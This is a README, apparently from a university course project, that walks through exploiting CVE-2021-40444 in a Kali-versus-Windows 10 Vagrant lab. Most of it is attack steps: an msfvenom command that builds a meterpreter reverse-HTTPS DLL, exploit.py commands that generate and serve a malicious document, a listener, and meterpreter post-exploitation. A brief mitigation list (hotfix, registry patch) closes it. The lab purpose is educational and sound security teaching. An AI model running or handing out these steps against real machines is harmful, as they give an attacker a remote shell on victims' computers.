## https://sploitus.com/exploit?id=111C9F44-593D-5E56-8040-615B48ED3E24
# TIC4301_Project
TIC4301 Project - CVE-2021-40444
Download the following vagrant boxes: \
Kali - https://drive.google.com/file/d/1RegQcT2jjFoaQRgLjXDYl4iS0HNt_mU2/view?usp=sharing \
Win10 - https://drive.google.com/file/d/1zcLertRoI-FrHDkRq1NO-KHaF88bMv6e/view?usp=sharing
Import the boxes with the following commands through vagrant:
1. vagrant box add kali kali_package.box
2. vagrant box add victim victim_package.box
3. vagrant init kali_package.box
4. vagrant init victim_package.box
5. vagrant up
Setup (win10):
1. In the win10 box, log in as administrator with the password vagrant.
2. Right click script.ps1 on the desktop and run with powershell. (Leave this open)
3. Run ipconfig.exe and obtain the address for this host.
Setup & Exploitation (Kali):
1. cd Desktop/CVE-2021-40444.
2. generate your malicious dll with msfvenom. # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll
3. start a listener in metasploit.
4. generate the malicious document. # python3 exploit.py generate test/shell.dll http://172.28.128.4 (kali ip)
5. sudo python3 exploit.py host 80 (to host your server for the file downloads)
6. visit http://<win 10 IP>/upload and upload the file.
7. listen for the shell.
Further Exploitation:
1. run post/windows/manage/migrate (meterpreter)
2. shell (meterpreter)
Mitigations:
1. Install KB5005565 hotfix.
2. Edit windows registry with patch.reg in the repository.